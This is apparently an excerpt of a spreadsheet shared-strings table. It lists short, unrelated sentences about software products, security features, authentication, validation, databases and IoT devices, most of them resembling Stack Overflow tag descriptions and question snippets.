    <t>Logs are usually text files containing records of events, such as user access or data manipulation as they occur, to serve as an audit trail, diagnostic device, or security measure.</t>
  </si>
  <si>
    <t>Features added over time include journaling, folder hard-linking, compression, and encryption.</t>
  </si>
  <si>
    <t>To help secure your applications, tools for input validation, signed cookies, form and HTML generators are all included.</t>
  </si>
  <si>
    <t>The developer tools include some new capabilities and improvements over the tools in IE8:
A new tab for inspecting network traffic.</t>
  </si>
  <si>
    <t>It can detect many vulnerability types including command injection, XPath injection, SQL/HQL injection, cryptography weaknesses and many more.</t>
  </si>
  <si>
    <t>Additionally, the NSMenuItem class also includes some private functionality needed to maintain binary compatibility with other components of Cocoa.</t>
  </si>
  <si>
    <t>I'm able to manually search for nearby BLE devices in the control panel and it recognizes the device (discoverable but not connected), but web bluetooth outright fails to see the device.</t>
  </si>
  <si>
    <t>*/
DigestAjax.WWW_AUTHENTICATE = 'WWW-Authenticate';
////////////////////////////////////////////////////////////////////////////
//      Primary AJAX Digest Authentication Function
////////////////////////////////////////////////////////////////////////////
/**
 * Submits an AJAX request with optional credentials to handle 
 * Digest authentication.</t>
  </si>
  <si>
    <t>You can use the script in your setup package to download addition components from Internet, or verify the license key online from your server, etc.</t>
  </si>
  <si>
    <t>Applications built with Microsoft Access 2010 can be distributed to end users with a free runtime version of the application that lets them view databases without needing the full installation of Access.</t>
  </si>
  <si>
    <t>Whether or not a device performs backup using Android Backup Service or another service is transparent to applicationsthe backup APIs used by applications are independent of the backup transport enabled on the device.</t>
  </si>
  <si>
    <t>Customizable Appearance: Validity delivers a solid core-library of validation tools that can be used in any web-design.</t>
  </si>
  <si>
    <t>Mapping is the process of defining how a document should be mapped to the Search Engine, including its searchable characteristics such as which fields are searchable and if/how they are tokenized.</t>
  </si>
  <si>
    <t>Required fields are a common form of front-end validation to prevent users from submitting data that is logically incomplete.</t>
  </si>
  <si>
    <t>Used to print information on a form
(typically given to the customer), or to print "validation"
information on a form.</t>
  </si>
  <si>
    <t>Applications built with Microsoft Access can be distributed to end users with a free run-time version of the application that lets them view databases without needing the full installation of Access.</t>
  </si>
  <si>
    <t>The distinguishing feature of CompCert is that it has been formally verified using the Coq proof assistant: the generated assembly code is formally guaranteed to behave as prescribed by the semantics of the source C code.</t>
  </si>
  <si>
    <t>From their website:
GDAX offers institutions and professionals the ability to trade a variety of digital currencies like Bitcoin, Ethereum, and more on a regulated U.S. based exchange.</t>
  </si>
  <si>
    <t>External Links
PHP and Zend Engine at zend.com
The PHP License
PHP at the Core: A Hacker's Guide to the Zend Engine
PHP.internals Mailing List</t>
  </si>
  <si>
    <t>For testing the validity of the transmission I'm sending a simple byte sequence from 0 to 47 which gets validated on the Arduino side.</t>
  </si>
  <si>
    <t>This conflicts with the documentation, and means these parts cannot be used for generating a License Code, because every time the device is rebooted, the License Code is then invalid, and this is bad.</t>
  </si>
  <si>
    <t>So, the protocol gateway performs protocol translation and some additional logic (message hydration) to include device specific identity for authorization purposes.</t>
  </si>
  <si>
    <t>Shareware is a program which gives partial functionality or access away for free to encourage the purchase of a license to unlock the full content.</t>
  </si>
  <si>
    <t>jQuery plugin which prevents user activity with the page (or part of the page) while it is triggered and until some action will unlock it.</t>
  </si>
  <si>
    <t>Better known for its L7 (HTTP) load-balancing functionality, F5 also delivers application (Layer 7) security and resilience services in both hardware and software form-factors.</t>
  </si>
  <si>
    <t>Provides both async and thread-per-connection for network IO,
allowing you to choose between scalability and blocking-only features
like socks/tor proxying.</t>
  </si>
  <si>
    <t>All permissions are
  defined in a single location (the Ability class) and not duplicated
  across controllers, views, and database queries</t>
  </si>
  <si>
    <t>It can benefit from the FIPS 140-2 validation of the OpenSSL FIPS Object Module, as long as the building process meets its Security Policy.</t>
  </si>
  <si>
    <t>Recovery testing is the forced failure of the software in a variety of ways to verify that recovery is properly performed.</t>
  </si>
  <si>
    <t>Validation uses routines, often called "validation rules" or "check routines", that check for correctness, meaningfulness, and security of data that are input to the system.</t>
  </si>
  <si>
    <t>The Common Alerting Protocol (CAP) is an XML-based data format for exchanging public warnings and emergencies between alerting technologies.</t>
  </si>
  <si>
    <t>It includes all the features you need to develop a connected product based on an Arm Cortex-M microcontroller, including security, connectivity, an RTOS, and drivers for sensors and I/O devices.</t>
  </si>
  <si>
    <t>The mechanism in this simple form would place a large operating burden on the root servers, with every search for an address starting by querying one of them.</t>
  </si>
  <si>
    <t>"protected views" is a JSF 2.2 feature of declaring a specific set of views which should require a CSRF protection token on GET requests.</t>
  </si>
  <si>
    <t>SMACK (Simplified Mandatory Access Control Kernel) s a Linux kernel security feature which protects data and process interaction from malicious manipulation.</t>
  </si>
  <si>
    <t>ServiceStack has an optional Authentication features to add Authentication to  services by providing web services to Authenticate existing users, Register new users as well Assign/UnAssign Roles to existing users.</t>
  </si>
  <si>
    <t>The .NET Framework includes a large library of functions as part of the Base Class Library (BCL), including those related to user interface design, data access, database connectivity, cryptography, development of web applications, mathematical algorithms, and network communications.</t>
  </si>
  <si>
    <t>Each will perform its own specific task in an isolated manner with full transactional integrity all without enlisting any resources (other than a message queue) in some form of transaction.</t>
  </si>
  <si>
    <t>Active Directory Single Sign-On via NTLM or Negotiate (SPNEGO) and Kerberos through SSPI,
Multisite Repository Replication,
Repository Management Delegation,
Remote Server Administration,
Operational and Access logging via Windows Event Log.</t>
  </si>
  <si>
    <t>The Node module, and the User module implement the integration with the Search module, allowing searching of the content of nodes, or the list of users that are registered in a Drupal site knowing the username, or (for administrator users) the email address.</t>
  </si>
  <si>
    <t>Features
Fast startup times
Hypervisor-level security
Custom Sizes
Public IP connectivity
Persistent storage
Linux and Windows containers
Co-scheduled groups
For more information, see Documentation</t>
  </si>
  <si>
    <t>I know that Intel Galileo's Quark processor is a i586 architecture.</t>
  </si>
  <si>
    <t>At least for several CherryPy releases  supports certificate_chain.</t>
  </si>
  <si>
    <t>Also, it comes with Automatic validation.</t>
  </si>
  <si>
    <t>A tested node crypto wrapper with easy storage portability.</t>
  </si>
  <si>
    <t>A JSR-303 Bean Validation Plugin for Struts2.</t>
  </si>
  <si>
    <t>It is a comprehensive user permissions and entitlements system for sails.js and Waterline.</t>
  </si>
  <si>
    <t>JBoss Cache is licensed under the LGPL license.</t>
  </si>
  <si>
    <t>Although some deeply embedded devices may only support Thumb.</t>
  </si>
  <si>
    <t>LDAP-, ActiveDirectory-, PAM-Authentication)
Licensed under the BSD-License</t>
  </si>
  <si>
    <t>The most valuable feature of libnids is reliability.</t>
  </si>
  <si>
    <t>24x7 monitoring and alerting.</t>
  </si>
  <si>
    <t>Magento provides full support, warranty and indemnification.</t>
  </si>
  <si>
    <t>There are Firebase auth features available besides the database.</t>
  </si>
  <si>
    <t>Stateless views and immutable data.</t>
  </si>
  <si>
    <t>Automatic failover and monitoring via Redis Sentinel.</t>
  </si>
  <si>
    <t>Use this if your overall layout contains transparency.</t>
  </si>
  <si>
    <t>Project Description
xVal is a validation framework for ASP.NET MVC applications.</t>
  </si>
  <si>
    <t>the login doesnt read the database
views.py
models.py
app.js
var user_id;
$(document).ready(function()
{
    $("#login_btn").click(function()
    {
        login();
    });
});
//DITO YUNG LOGIN FUNCTIONALITY
function login()
{
    $.post(
        'login',
        {
           username: $("#username").val(),
           password: $("#password").val()
        },
        function(data, status)
        {
            if(data.response)
            {
                location.assign('register')
            }
            else{
                $("#login_response").html("Invalid Username or Password")
            }
        }
        );
}</t>
  </si>
  <si>
    <t>OpenCV was officially launched by Intel in 1999 and is now supported by Itseez.</t>
  </si>
  <si>
    <t>The tool executes a comprehensive collection of sanity tests cases over each federated node in FIWARE Lab in order to validate their capabilities and show graphically the results of these executions on a web dashboard to be easily consulted and analysed by node administrators and FIWARE Lab users.</t>
  </si>
  <si>
    <t>Improvements includes, but not limited to:
Partitioning 
Parallelism SQL Stored Procedures 
Just-In-Time (JIT) Compilation Introduced
Window Functions Fully Support SQL:2011 standard
Channel Binding for SCRAM Authentication
User Experience Enhancements
More information regarding release available here.</t>
  </si>
  <si>
    <t>MBProgressHUD is meant as a replacement for the undocumented, private UIKit UIProgressHUD with some additional features.</t>
  </si>
  <si>
    <t>The database layer provides protection against SQL injection.</t>
  </si>
  <si>
    <t>Supports OAuth out of the box (as well as Basic/Digest or custom auth.)</t>
  </si>
  <si>
    <t>In order to increase the quality of jOOQ, we run unit tests for syntax and variable binding verification, as well as integration tests for any of these databases:
Access
Aurora for MySQL
Aurora for PostgreSQL
Azure SQL Database
Azure SQL Data Warehouse
CUBRID
DB2
Derby
Firebird
H2
HSQLDB
Informix
Ingres
MariaDB
MySQL
Oracle
PostgreSQL
Redshift
SQLite
SQL Server
Sybase Adaptive Server Enterprise
Sybase SQL Anywhere
Teradata
Vertica
Similar products
When you consider jOOQ for your project, you might also have considered any of these similar products:
Querydsl: Focusing on the DSL and abstracting "backend integrations", such as SQL, JPA, collections, etc.</t>
  </si>
  <si>
    <t>CredSSP is a new Security Support Provider (SSP) that is available in Windows XP SP3 by using the Security Support Provider Interface (SSPI).</t>
  </si>
  <si>
    <t>You can use it for recommendation engines, fraud detection, graph-based search, network ops/security, and many other user cases.</t>
  </si>
  <si>
    <t>A Python library and command-line tool for streamlining the use of SSH for application deployment or systems administration tasks.</t>
  </si>
  <si>
    <t>Actual security requirements tested depend on the security requirements implemented by the system.</t>
  </si>
  <si>
    <t>Lift stresses the importance of security, maintainability, scalability and performance, while allowing for high levels of developer productivity.</t>
  </si>
  <si>
    <t>For example, the application might post a notification, display a custom user interface, or silently sync data.</t>
  </si>
  <si>
    <t>A small .NET and JavaScript library which provides annotation-based conditional validation mechanisms.</t>
  </si>
  <si>
    <t>RC4 is fairly simple to understand and implement, on the other side, however, strong attacks on RC4 are known.</t>
  </si>
  <si>
    <t>CloudTrax is a cloud-based network controller that provides centralized management, monitoring and reporting for wireless networksright from browser.</t>
  </si>
  <si>
    <t>A .Net framework to create fake objects, mocks, stubs, etc.</t>
  </si>
  <si>
    <t>Requirements and best practices for secure coding will differ across programming languages.</t>
  </si>
  <si>
    <t>Once I changed the path to include the port and no authentication, I'm able to deploy successfully from visual studio.</t>
  </si>
  <si>
    <t>Therefore, you may want to use custom fields in your certificate that you can read in your function, and then allocate your IoT Hub of choice based on their contents.</t>
  </si>
  <si>
    <t>SQLCipher is an open source extension to SQLite that provides transparent 256-bit AES encryption of database files.</t>
  </si>
  <si>
    <t>PVCS is a collection of tools that provide integrated version control, bug tracking, and configuration management for software projects.</t>
  </si>
  <si>
    <t>Data may be collected by monitoring notifications sent from existing services or by polling the infrastructure.</t>
  </si>
  <si>
    <t>For 10+ years, our embedded system has been running XP Embedded from a partition on the hard drive that was protected by the RAM-based EWF.</t>
  </si>
  <si>
    <t>jini (aka Apache River) is a SOA programming model that extends Java to create secure distributed systems consisting of clients and services.</t>
  </si>
  <si>
    <t>Zend_Validate_Interface defines two methods, isValid() and getMessages(), that may be implemented by user classes in order to create custom validation objects.</t>
  </si>
  <si>
    <t>Features:
Automatic resource management
Type safety
Error handling and diagnostic
Interoperability with OpenGL C API
Configurability
Links:
Official website</t>
  </si>
  <si>
    <t>I've got a large Azure IOT Suite implementation and I'd like to back it up or export the various jobs/components for safe keeping.</t>
  </si>
  <si>
    <t>Redundancy is the duplication of critical components or functions of a system with the intention of increasing reliability of the system, usually in the case of a backup or fail-safe.</t>
  </si>
  <si>
    <t>It offers services for data capture,PDF processing, digital signatures, document security, content services, process management.</t>
  </si>
  <si>
    <t>Because the Access team now owns the engine, developers can be confident that their Access solutions will not only continue to work in the future but will also be faster, more robust, and feature rich.</t>
  </si>
  <si>
    <t>aurelia-auth is a token-based authentication plugin for Aurelia with support for popular social authentication providers (Google, Twitter, Facebook, LinkedIn, Windows Live, FourSquare, Yahoo, Github, Instagram ) and a local stragegy, i.e.</t>
  </si>
  <si>
    <t>Its purpose is to provide configuration file enforcement, service state monitoring, package installation and other server-side management.</t>
  </si>
  <si>
    <t>Coherence includes network-level fault tolerance features and transparent soft re-start capability to enable servers to self-heal.</t>
  </si>
  <si>
    <t>You can use the script in your setup package to download additional components from the Internet, or verify the license key online from your server, etc.</t>
  </si>
  <si>
    <t>Benefits being you can always just easily port the entire database by reading the SQLite file and avoiding the lock-issues you've mentioned.</t>
  </si>
  <si>
    <t>A Gated-Check-in is a TFS feature that allows code submitted to a TFS source control system to be built and validated before being accepted for submission to the source control.</t>
  </si>
  <si>
    <t>Hibernate Envers is a core module of the Hibernate framework that enables simple entity auditing and change tracking using annotations and simple configuration steps.</t>
  </si>
  <si>
    <t>When coordinating updates from multiple database sessions, optimistic locking is a strategy that assumes all updates can complete without conflict.</t>
  </si>
  <si>
    <t>You can install the IMA SDK library in your authoring environment (Adobe Flash CS3/CS4) to facilitate the SDK integration into your rich media content.</t>
  </si>
  <si>
    <t>Using the Mask property, you can specify the following input without writing any custom validation logic in your application:
Required input characters.</t>
  </si>
  <si>
    <t>In the past I have either relied on writing database Triggers for the tables, or wrote the Auditing logic right into the stored procedure that was doing the modification.</t>
  </si>
  <si>
    <t>You can then provide this IP address to an API partner or use it to form the basis of inbound firewall rules to connect to a protected resource such as an internal API or database.</t>
  </si>
  <si>
    <t>This method first checks to see if the form
was hijacked by Remotipart and was thus submitted in an iFrame, and
if so, it returns our generated JS inside a textarea element, so
that it automatically gets executed in our parent window.</t>
  </si>
  <si>
    <t>The module also supports the Negotiate authentication method, which performs full Kerberos authentication based on ticket exchanges, and does not require users to insert their passwords to the browser.</t>
  </si>
  <si>
    <t>Spring Vault provides familiar Spring abstractions and client-side support for accessing, storing and revoking secrets.</t>
  </si>
  <si>
    <t>Native Client provides accesses to browser-side resources through the Pepper Plugin API (PPAPI) so that untrusted code could safely access audio, 2d and 3d graphics, mouse and keyboard events, etc.</t>
  </si>
  <si>
    <t>Input validation uses routines, often called "validation rules" or "check routines", that check for correctness, meaningfulness, and security of data that are input to the system.</t>
  </si>
  <si>
    <t>It has built-in functionality for LDAP authentication and authorization, makes securing Shiny traffic (over TLS) a breeze and has no limits on concurrent usage of a Shiny app.</t>
  </si>
  <si>
    <t>It provides a high performance mutli-threaded scanning daemon, command line utilities for on demand file scanning, and an intelligent tool for automatic signature updates.</t>
  </si>
  <si>
    <t>OpenDNS is a company and service which extends the Domain Name System by adding features such as phishing protection and optional content filtering to traditional recursive DNS services</t>
  </si>
  <si>
    <t>Official website
GitHub repo
The BFG Repo-Cleaner is even officially endorsed as an alternative in the official Git documentation for filter-branch itself:
git-filter-branch allows you to make complex shell-scripted rewrites
  of your Git history, but you probably dont need this flexibility if
  youre simply removing unwanted data like large files or passwords.</t>
  </si>
  <si>
    <t>The Google OAuth 2.0 endpoint supports server-to-server interactions such as those between a web application and Google Cloud Storage.</t>
  </si>
  <si>
    <t>All authentication using google accounts that includes plugins, application, games etc.</t>
  </si>
  <si>
    <t>liferay-util
liferay-theme
liferay-security
aui (AlloyUI taglib): A wrapper around Alloy UI to provide consistent UI components across the portal.</t>
  </si>
  <si>
    <t>Which cipher would provide a decent balance between performance and security?</t>
  </si>
  <si>
    <t>When doing an ssh -v(erbose) on the client side, there is zero errors
or activity.</t>
  </si>
  <si>
    <t>The question: Am I able to audit the file itself to a database?</t>
  </si>
  <si>
    <t>In addition to all of the above, I'd recommend you to use the the mongo client to verify your credentials are right and you can connect to the database.</t>
  </si>
  <si>
    <t>There are thousands of application-layer protocols: SMTP, IMAP, and POP3 for email; XMPP, IRC, ICQ for chat; Telnet, SSH, RDP for remote administration; etc.</t>
  </si>
  <si>
    <t>Google has released a smart home sync response validator tool.</t>
  </si>
  <si>
    <t>Also see PR 3108, SIGILL-free processor capabilities detection on MacOS X.</t>
  </si>
  <si>
    <t>It might not be the best choice depending on how tight your security requirements are.</t>
  </si>
  <si>
    <t>When you use the database secret, all your access to the database is completely unrestricted, and is not affected by security rules.</t>
  </si>
  <si>
    <t>When you deploy UWP applicaton via Visual Studio it use DefaultAccount user.</t>
  </si>
  <si>
    <t>However, when using Node.js, offline persistence is not yet supported.</t>
  </si>
  <si>
    <t>Take a look at Remote Monitoring architectural choices.</t>
  </si>
  <si>
    <t>Textboxlist is a autocomplete/tokenisation widget developed for MooTools and jQuery.</t>
  </si>
  <si>
    <t>IAIK-JCE is a crypto toolkit which means "Institute for Applied Information Processing and Communication - Java Cryptography Extension"</t>
  </si>
  <si>
    <t>It works for client and server side validation.</t>
  </si>
  <si>
    <t>ISAPI Redirect is a server plugin that facilitates transactions between Microsoft IIS and Apache Tomcat.</t>
  </si>
  <si>
    <t>Cannot add foreign key constraint</t>
  </si>
  <si>
    <t>It supports Federation of authentication across a variety of schemes.</t>
  </si>
  <si>
    <t>DBArtisan is the premiere database administration toolset helping DBAs maximize availability, performance and security across multiple DBMSs.</t>
  </si>
  <si>
    <t>JungleDisk online backup service for businesses.</t>
  </si>
  <si>
    <t>In other words, the value does not have referential transparency.</t>
  </si>
  <si>
    <t>Classification and optional redaction of sensitive data like PII.</t>
  </si>
  <si>
    <t>This allows the code to be mined using complex queries formulated in the graph traversal languages Gremlin and Cypher.</t>
  </si>
  <si>
    <t>TCPDF Supports UTF-8, Unicode, RTL languages, XHTML, Javascript, digital signatures, barcodes and much more.</t>
  </si>
  <si>
    <t>Envers: Easy Entity Auditing for Hibernate</t>
  </si>
  <si>
    <t>Model validation works for client and server side validation.</t>
  </si>
  <si>
    <t>For the Cypher graph query language, use the cypher tag.</t>
  </si>
  <si>
    <t>Braintree provide client libraries and integration examples in Ruby, Python, PHP, Java, .NET, and Node JS; mobile libraries for iOS and Android; and Braintree.js for in-browser card encryption.</t>
  </si>
  <si>
    <t>Supports transparent redirect handling.</t>
  </si>
  <si>
    <t>Over 6,000 e-commerce businesses benefit from the minFraud service through our client and partner networks.</t>
  </si>
  <si>
    <t>Flask-Login is not bound to any particular database system or permissions model.</t>
  </si>
  <si>
    <t>See also evader; evasion; evasion and recovery; recovery operations; security.</t>
  </si>
  <si>
    <t>Pexpect can be used for 
automating interactive applications such as ssh, ftp, passwd, telnet etc.</t>
  </si>
  <si>
    <t>PC Tuneup and Performance Optimizer are available in the Total Security Suite.</t>
  </si>
  <si>
    <t>Validate form fields against that same JSON schema.</t>
  </si>
  <si>
    <t>In-app bug reporting allows defects to be submitted in seconds while using the app from your mobile device.</t>
  </si>
  <si>
    <t>RadUpload - a control for single- and multi-file uploads, integrated file validation and more.</t>
  </si>
  <si>
    <t>Struts2 jsr303 validation plugin's homepage 
JSR-303 standardizes validation constraint declaration and metadata for the Java platform.</t>
  </si>
  <si>
    <t>It is the successor to OS X Yosemite and focuses mainly on performance, stability and security.</t>
  </si>
  <si>
    <t>It is part of the iOS Mobile
Application Security project
and is released under the Apache license.</t>
  </si>
  <si>
    <t>This HTML form attribute indicates how form data should be encoded when it is submitted to the server.</t>
  </si>
  <si>
    <t>Are foreign keys really necessary in a database design?</t>
  </si>
  <si>
    <t>The vision with Ranger is to provide comprehensive security across the Apache Hadoop ecosystem.</t>
  </si>
  <si>
    <t>With updates to API's and addition of CancellationToken support as well as IReadOnlyCollections more concisely.</t>
  </si>
  <si>
    <t>Some of its features are type safety and performance.</t>
  </si>
  <si>
    <t>The Google Maps JavaScript API v3 also provides support for Keyhole Mark-Up Language (KML) and Google also provides information about the v3 API's KML Support.</t>
  </si>
  <si>
    <t>Firecracker currently supports Intel CPUs, with planned AMD and Arm support.</t>
  </si>
  <si>
    <t>Public-key authentication support (no certificate support).</t>
  </si>
  <si>
    <t>If you configure a collection for immediate synchronisation you protect against this, but the performance is affected.</t>
  </si>
  <si>
    <t>A python library for implementing powerful interception proxies.</t>
  </si>
  <si>
    <t>Fluent Security provides a fluent interface for configuring security in ASP.NET MVC.</t>
  </si>
  <si>
    <t>It is often restricted to database users with administrative privileges.</t>
  </si>
  <si>
    <t>I'm just trying to get myself here "http://192.168.1.103:30000/?k=23&amp;v=capture" when an if condition meet its requirement.</t>
  </si>
  <si>
    <t>Profiling helps to understand anomalies and to assess data quality, but also to discover, register, and assess enterprise metadata.</t>
  </si>
  <si>
    <t>Spring Security SAML Extension enables integration of Spring applications with all SAML 2.0 Identity Provider products such as ADFS 2.0, Shibboleth, OpenAM/OpenSSO, Ping Federate and Okta.</t>
  </si>
  <si>
    <t>PyCrypto - The Python Cryptography Toolkit is a package that contains various cryptographic modules for the Python programming language.</t>
  </si>
  <si>
    <t>With the release of .NET 4.0, portions of CAS have been deprecated or are no longer implemented, including the RequestOptional and LinkDemand SecurityActions, among others.</t>
  </si>
  <si>
    <t>in a company) but in how these are implemented (which permissions are implemented, in which way we combine them, how they impact performance, ...).</t>
  </si>
  <si>
    <t>MapR Enterprise Edition (formerly M5)
Adds high availability and data protection, including multi-node NFS.</t>
  </si>
  <si>
    <t>Some of its many features include monitoring of network services (SMTP, POP3, HTTP, NNTP, ICMP, etc.</t>
  </si>
  <si>
    <t>I have an IotHub trigger which basically saves an incoming id to the database using Entity Framework if such an id does not exist.</t>
  </si>
  <si>
    <t>GnuPG allows to encrypt and sign your data and communication, features a versatile key management system as well as access modules for all kinds of public key directories.</t>
  </si>
  <si>
    <t>Currently, there are starter projects for a web project (tomcat and jetty based), spring-batch, spring-data-jpa, spring-integration, spring-security exist.</t>
  </si>
  <si>
    <t>Storing configuration in the
  environment separate from code is based on The Twelve-Factor App
  methodology.</t>
  </si>
  <si>
    <t>It is fully transactional, secure, easy-to-use, standards-based  SQL, JDBC API, and Java EE  yet small, only 2.6 MB.</t>
  </si>
  <si>
    <t>Includes new features such as an enhanced user interface, multimedia and game functionality, greater connectivity, over-the-air (OTA) provisioning, and end-to-end security.</t>
  </si>
  <si>
    <t>Shibboleth also provides extended privacy functionality allowing the browser user and their home site to control the attributes released to each application.</t>
  </si>
  <si>
    <t>Our open source device SDKs implement the generation and renewal of the SAS token based on a private key that never goes on the wire.</t>
  </si>
  <si>
    <t>Using transactional memory (implemented by optimistic synchronization) instead of locks removes the risk of a deadlock.</t>
  </si>
  <si>
    <t>Filters can be used to cache the output, handle errors, and restrict access based on authorization rules.</t>
  </si>
  <si>
    <t>Synergex PVCS is a collection of tools that provide integrated version control, bug tracking, and configuration management for software projects.</t>
  </si>
  <si>
    <t>An extension or library used in certain programming languages or frameworks (namely Ruby or Yii2) for generating fake data for debug purposes and testing.</t>
  </si>
  <si>
    <t>For example, the extension receives notification when the user opens a monitored folder in the Finder or in an Open or Save dialog.</t>
  </si>
  <si>
    <t>Location transparency  The system cal exploit TIBs subject based addressing to allow system components to be located dynamically, rather than being hard-coded.</t>
  </si>
  <si>
    <t>Even though you can access folders out of your app private storage area,the SQLiteApi in UWP does not support for SQLite which expects a filename.</t>
  </si>
  <si>
    <t>Intel's Advanced Encryption Standard (AES) New Instructions (AES-NI) is an extension to the x86 instruction set architecture for microprocessors from Intel and AMD proposed by Intel in March 2008.</t>
  </si>
  <si>
    <t>While some of the pitfalls of this can be avoided with validation, it's a very dangerous way of entering data; any attribute on the model (any column in the table) could be modified, including the ID.</t>
  </si>
  <si>
    <t>A DTO protects the application's internal data by acting as dummy storages, the whole logic is implemented only in actual Domain Objects (DO).</t>
  </si>
  <si>
    <t>Claims were introduced in .NET4.5 to build Claims based authentication into the framework in the form of ClaimsIdentity and ClaimsPrincipal in the System.Security.Claims namespace.</t>
  </si>
  <si>
    <t>Also the problem is I am trying to maintain the view state in global object(login/logout button based on if user in logged-in or not) which get lost with server-side rendering.</t>
  </si>
  <si>
    <t>Examples of public profiles include: 
Home Automation
Smart Energy
Commercial Building Automation"
So, if you are using only XBees on your network, you don't need to care about the profile id.</t>
  </si>
  <si>
    <t>These live in a global platform applet called mIAS that implements a full security suite (similar to OpenSSL).</t>
  </si>
  <si>
    <t>Experitest is a provider of quality assurance tools for mobile DevOps, including manual testing, performance testing, load testing and monitoring for mobile applications.</t>
  </si>
  <si>
    <t>Older browsers did not include this feature, leading to abuse: A page could trigger alert infinitely many times in a loop, blocking the whole UI.</t>
  </si>
  <si>
    <t>This all works fine :) I can start the Application by entering the following command:
When the application starts it takes full control over mouse an keyboard, so there is no way back into console, but this doesent maters because it is just a monitoring system an i am able to shut the mashine down over ssh.</t>
  </si>
  <si>
    <t>The Cryptographic Application Programming Interface (MS-CAPI) is an application programming interface included with Microsoft Windows operating systems that provides services to enable developers to secure Windows-based applications using cryptography</t>
  </si>
  <si>
    <t>The SocketScan Software Development Kit (SDK) enables developers to create custom applications with support for Bluetooth barcode scanners</t>
  </si>
  <si>
    <t>Spring Vault provides familiar Spring abstractions and client-side support for accessing, storing and revoking secrets from HashiCorp Vault.</t>
  </si>
  <si>
    <t>It facilitates the mapping of MongoDB documents to Python objects, and offers the ability to enforce and or validate the documents that are put into MongoDB.</t>
  </si>
  <si>
    <t>The following image shows a typical portal-page:
A portal supports a lot of features like authentication, authorization, content-aggregation, customization, and personalization.</t>
  </si>
  <si>
    <t>Some actions that could be achieved using pre-commit hooks:
Fixing case issues in file names
Validating file content, such as executing a linter or
code convention checker.</t>
  </si>
  <si>
    <t>The profile feature provides a generic storage feature that allows you to define and maintain almost any kind of data while still making the data available in a type-safe manner.</t>
  </si>
  <si>
    <t>Although it is the most usual form to work with this component, it is possible to define any other regions, only configuring the corresponding glance service endpoint and the administrative credentials of this node.</t>
  </si>
  <si>
    <t>MobaXterm is windows desktop application which includes:
remote network tools (SSH, X11, RDP, VNC, FTP, MOSH, ...)
Unix commands (bash, ls, cat, sed, grep, awk, rsync, ...) 
embedded servers (TFTP, FTP, HTTP, SSH/SFTP, telnet, ...)
MobApt package manager
support for SSH tunneling</t>
  </si>
  <si>
    <t>OpenAM provides the foundation for integrating diverse web applications that might typically operate against a disparate set of identity repositories and are hosted on a variety of platforms such as web and application servers.</t>
  </si>
  <si>
    <t>It has several paid tiers and a small free tier and various tiers support features such as:
Receive signatures online
Cloud storage of forms
Reminders
Templates
Reporting
Homepage: http://www.docusign.com
API on SO: http://stackoverflow.com/questions/tagged/docusignapi</t>
  </si>
  <si>
    <t>As authentication I am building a SharedAccessSignature as can be seen on the example repository and below, however as far as I can tell unlike SharedAccessKeyAuthenticationProvider.fromConnectionString there is no way to specify the gatewayHostName.</t>
  </si>
  <si>
    <t>The  extension is often prependen by .db (.db.crypt12) indicating that it contains a database.</t>
  </si>
  <si>
    <t>HP Fortify Software Security Center is suite of software application security analyzers and management application.</t>
  </si>
  <si>
    <t>Laravel Authorization is the service provided by the framework for authorization methodology.</t>
  </si>
  <si>
    <t xml:space="preserve"> Stands for Cypher Query Language.</t>
  </si>
  <si>
    <t>OCI is comprised of Compute, Storage, Database, Identity Management, Networking, DNS and Cloud and Container Native solutions.</t>
  </si>
  <si>
    <t>Extensions: Validation (jsr303) and SLF4J Logging.</t>
  </si>
  <si>
    <t>Monitoring is the act of looking on the processes or systems for performance, supervision and surveillance.</t>
  </si>
  <si>
    <t>Because I need Spring-security-core and Spring-security-ui plugins, so I also tried a clean app with those plugins.</t>
  </si>
  <si>
    <t>Token error identified in Processing 2 at Class Database.</t>
  </si>
  <si>
    <t>Is there an easier way maybe via sysfs(something like echo "14" &gt; /sys/class/gpio/export) or something else so we gain access?</t>
  </si>
  <si>
    <t>I want to send automated emails form my raspberry pi.</t>
  </si>
  <si>
    <t>Failed to register
  through new deployment pipeline.</t>
  </si>
  <si>
    <t>I'm trying to install and validate fmod on my raspberry pi 1 model b with debian by running the provided example program play_stream.</t>
  </si>
  <si>
    <t>I also saw a comment like "it means certificate is not permissive enough for AWS" but I am using same certificates for both Linux and embedded side.</t>
  </si>
  <si>
    <t>And everytime a fingerprint was taken it should go to the database and search if there is a similar one.</t>
  </si>
  <si>
    <t>");
        ^
Error: The requested accessory 'Nest' was not registered by any
  plugin.</t>
  </si>
  <si>
    <t>What you can do is define guards like this:
or you could include #pragma once in your header file, if your compiler supports it.</t>
  </si>
  <si>
    <t>After you are logged in run sudo raspi-config and then configure the keyboard layout / locale back to whatever language the keyboard is in.</t>
  </si>
  <si>
    <t>Cache snooping only works with caches enable so any mix of enabled/disabled caches will have inconsistencies.</t>
  </si>
  <si>
    <t>I'm not sure about the arduino, the crypto behind the protocol is fairly complex and I'm not sure the processor could handle it well.</t>
  </si>
  <si>
    <t>Visual Studio will not let you deploy your application with an expired certificate.</t>
  </si>
  <si>
    <t>The uno is not powerful enough to do encryption, you need to look for a more powerful platform.</t>
  </si>
  <si>
    <t>When done, provide visual/audio feedback again, and store that passcode in the Arduino's EEPROM.</t>
  </si>
  <si>
    <t>Use nmap to determine which cipher suites that Amazon is supporting and then enable the best ones in WolfSSL.</t>
  </si>
  <si>
    <t>Compare the result (which includes the PEM form of the certificate) with the new certificate.</t>
  </si>
  <si>
    <t>With this IP address, you can either debug app with Visual Studio or connect to the Raspberry Pi via SSH.</t>
  </si>
  <si>
    <t>Keep in mind that Visual Studio connects to the raspberry using SSH, so it's needed to enable it in the raspberry.</t>
  </si>
  <si>
    <t>30 June 2018 is the cutoff date at which point TLS 1.0 will not be supported if you want to claim PCI compliance.</t>
  </si>
  <si>
    <t>(Edge device only supports symmetric key authentication but doesn't support x509 certificate authentication).</t>
  </si>
  <si>
    <t>The question is which protocols your devices support and how configurable your devices are.</t>
  </si>
  <si>
    <t>FR3DLdapBundle is a Symfony2 bundle that provides authentication support against Ldap Directories.</t>
  </si>
  <si>
    <t>ARMv6 architecture introduced Thumb-2, TrustZone and SIMD support.</t>
  </si>
  <si>
    <t>A form of entropy encoding used in lossless data compression.</t>
  </si>
  <si>
    <t>A search engine that does not track searchers and that can be hacked with DuckDuckHack.</t>
  </si>
  <si>
    <t>The standard accessory views include the disclosure chevron.</t>
  </si>
  <si>
    <t>Entitlements confer specific capabilities or security permissions to your app.</t>
  </si>
  <si>
    <t>It supports a customized User table and OAuth.</t>
  </si>
  <si>
    <t>It is the core base of a complete business solution providing modularity, scalability and security.</t>
  </si>
  <si>
